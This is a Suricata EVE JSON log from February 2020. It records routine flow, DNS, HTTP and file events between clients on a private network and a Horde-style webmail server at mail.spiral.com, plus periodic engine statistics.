{"timestamp":"2020-02-29T00:01:18.000667+0000","flow_id":1743257055554502,"event_type":"flow","src_ip":"192.168.10.81","src_port":52626,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":773,"bytes_toclient":767,"start":"2020-02-29T00:00:12.224198+0000","end":"2020-02-29T00:00:17.231773+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:18.000924+0000","flow_id":67704414066182,"event_type":"flow","src_ip":"192.168.10.81","src_port":52624,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1402,"bytes_toclient":2795,"start":"2020-02-29T00:00:12.185862+0000","end":"2020-02-29T00:00:17.230742+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:18.001076+0000","flow_id":937559845345076,"event_type":"flow","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":22,"pkts_toclient":20,"bytes_toserver":3698,"bytes_toclient":15034,"start":"2020-02-29T00:00:09.562996+0000","end":"2020-02-29T00:00:17.317658+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:19.991004+0000","flow_id":1043121556102940,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37302,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39943,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:20.096028+0000","flow_id":1043121556102940,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37302,"proto":"UDP","dns":{"type":"answer","id":39943,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:20.096028+0000","flow_id":1043121556102940,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37302,"proto":"UDP","dns":{"type":"answer","id":39943,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:20.243435+0000","flow_id":752305025627883,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44785,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20497,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:20.270208+0000","flow_id":1393011066924782,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6136}} {"timestamp":"2020-02-29T00:01:20.354683+0000","flow_id":752305025627883,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44785,"proto":"UDP","dns":{"type":"answer","id":20497,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:20.354683+0000","flow_id":752305025627883,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44785,"proto":"UDP","dns":{"type":"answer","id":20497,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:20.522450+0000","flow_id":2014930921353933,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6966}} {"timestamp":"2020-02-29T00:01:22.216915+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52642,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927},"app_proto":"http","fileinfo":{"filename":"\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":22457,"tx_id":2}} {"timestamp":"2020-02-29T00:01:22.217017+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52648,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/base64.js","state":"CLOSED","stored":false,"size":6586,"tx_id":3}} {"timestamp":"2020-02-29T00:01:22.217071+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52644,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401},"app_proto":"http","fileinfo":{"filename":"\/js\/colorpicker.js","state":"CLOSED","stored":false,"size":12973,"tx_id":2}} {"timestamp":"2020-02-29T00:01:22.402386+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/ico_message_off.png","state":"CLOSED","stored":false,"size":468,"tx_id":4}} {"timestamp":"2020-02-29T00:01:22.696950+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/plus.png","state":"CLOSED","stored":false,"size":351,"tx_id":14}} {"timestamp":"2020-02-29T00:01:22.698813+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/folder.png","state":"CLOSED","stored":false,"size":211,"tx_id":17}} {"timestamp":"2020-02-29T00:01:23.123898+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52650,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264}} {"timestamp":"2020-02-29T00:01:23.144741+0000","flow_id":992711525217637,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57146,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50836,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:23.170777+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52650,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/az.png","state":"CLOSED","stored":false,"size":264,"tx_id":0}} {"timestamp":"2020-02-29T00:01:23.249667+0000","flow_id":992711525217637,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57146,"proto":"UDP","dns":{"type":"answer","id":50836,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:23.249667+0000","flow_id":992711525217637,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57146,"proto":"UDP","dns":{"type":"answer","id":50836,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:23.369326+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52650,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364}} {"timestamp":"2020-02-29T00:01:23.369326+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52650,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":1}} {"timestamp":"2020-02-29T00:01:23.842322+0000","flow_id":1393011066924782,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34690,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6136},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30698,"tx_id":0}} {"timestamp":"2020-02-29T00:01:23.849154+0000","flow_id":644114799654146,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41023,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5114,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:23.954296+0000","flow_id":644114799654146,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41023,"proto":"UDP","dns":{"type":"answer","id":5114,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:23.954296+0000","flow_id":644114799654146,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41023,"proto":"UDP","dns":{"type":"answer","id":5114,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:24.000144+0000","event_type":"stats","stats":{"uptime":13736,"capture":{"kernel_packets":132216,"kernel_drops":0},"decoder":{"pkts":132231,"bytes":91835352,"invalid":176,"ipv4":130810,"ipv6":8,"ethernet":132231,"raw":0,"null":0,"sll":0,"tcp":125852,"udp":4768,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2659,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2675,"synack":2666,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1707,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2173,"failed_udp":106},"tx":{"http":4431,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2249}},"flow_mgr":{"closed_pruned":2636,"new_pruned":15,"est_pruned":2222,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20167,"memcap_state":0,"memcap_global":0},"http":{"memuse":162597,"memcap":0}}} {"timestamp":"2020-02-29T00:01:24.001024+0000","flow_id":1683591370237100,"event_type":"flow","src_ip":"192.168.10.81","src_port":52628,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1639,"bytes_toclient":7608,"start":"2020-02-29T00:00:17.779436+0000","end":"2020-02-29T00:00:23.125126+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:24.022214+0000","flow_id":1393011066924782,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3978}} {"timestamp":"2020-02-29T00:01:24.462742+0000","flow_id":2014930921353933,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34692,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6966},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37746,"tx_id":0}} {"timestamp":"2020-02-29T00:01:24.471666+0000","flow_id":1948590856745586,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59007,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61595,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:24.576661+0000","flow_id":1948590856745586,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59007,"proto":"UDP","dns":{"type":"answer","id":61595,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:24.576661+0000","flow_id":1948590856745586,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59007,"proto":"UDP","dns":{"type":"answer","id":61595,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:24.660332+0000","flow_id":2014930921353933,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8105}} {"timestamp":"2020-02-29T00:01:28.331895+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52650,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":592,"tx_id":1}} {"timestamp":"2020-02-29T00:01:29.000577+0000","flow_id":71243452414947,"event_type":"flow","src_ip":"192.168.10.122","src_port":56790,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:28.621539+0000","end":"2020-02-28T23:56:28.733376+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:29.023050+0000","flow_id":1393011066924782,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34690,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3978},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19145,"tx_id":1}} {"timestamp":"2020-02-29T00:01:29.661634+0000","flow_id":2014930921353933,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34692,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8105},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":33524,"tx_id":1}} {"timestamp":"2020-02-29T00:01:29.964448+0000","flow_id":943744603502432,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58746,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37232,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:30.077302+0000","flow_id":943744603502432,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58746,"proto":"UDP","dns":{"type":"answer","id":37232,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:30.077302+0000","flow_id":943744603502432,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58746,"proto":"UDP","dns":{"type":"answer","id":37232,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:30.169791+0000","flow_id":679183207983578,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34694,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":18979}} {"timestamp":"2020-02-29T00:01:31.000234+0000","event_type":"stats","stats":{"uptime":13743,"capture":{"kernel_packets":132263,"kernel_drops":0},"decoder":{"pkts":132278,"bytes":91855239,"invalid":176,"ipv4":130857,"ipv6":8,"ethernet":132278,"raw":0,"null":0,"sll":0,"tcp":125893,"udp":4774,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2660,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2676,"synack":2667,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1708,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2176,"failed_udp":106},"tx":{"http":4435,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2252}},"flow_mgr":{"closed_pruned":2637,"new_pruned":15,"est_pruned":2222,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20498,"memcap_state":0,"memcap_global":0},"http":{"memuse":190556,"memcap":0}}} {"timestamp":"2020-02-29T00:01:32.000295+0000","flow_id":2134528561762561,"event_type":"flow","src_ip":"192.168.10.122","src_port":56514,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:56:31.315649+0000","end":"2020-02-28T23:56:31.423684+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:33.000227+0000","flow_id":285721234508130,"event_type":"flow","src_ip":"192.168.10.122","src_port":59579,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:32.657762+0000","end":"2020-02-28T23:56:32.766092+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:33.000465+0000","flow_id":1885441933501218,"event_type":"flow","src_ip":"192.168.10.122","src_port":49099,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:32.844578+0000","end":"2020-02-28T23:56:32.956150+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:33.000662+0000","flow_id":1923147451373618,"event_type":"flow","src_ip":"192.168.10.122","src_port":34286,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:32.235570+0000","end":"2020-02-28T23:56:32.347026+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:34.000690+0000","flow_id":1913015623544439,"event_type":"flow","src_ip":"192.168.10.122","src_port":35939,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:32.978551+0000","end":"2020-02-28T23:56:33.086800+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 